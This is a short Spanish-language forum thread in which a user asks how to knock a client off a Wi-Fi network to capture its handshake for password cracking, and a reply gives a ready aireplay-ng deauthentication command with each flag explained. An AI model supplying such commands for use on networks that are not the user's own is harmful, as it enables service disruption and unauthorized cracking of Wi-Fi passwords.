HandShake

Publicado por WoZz, 23 de Agosto de 2017, 11:40:30 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

WoZz

Hola a todos.

Quería saber si conocen alguna manera para desautenticar un cliente de una red Wi-Fi desde Windows 7.
Lo que necesito es obtener el handshake para usar FiberCrunch.

Gracias!

siqfacboi

You have to search this: deauthentication attack: aireplay-ng


siqfacboi

Usage

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:

-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
ath0 is the interface name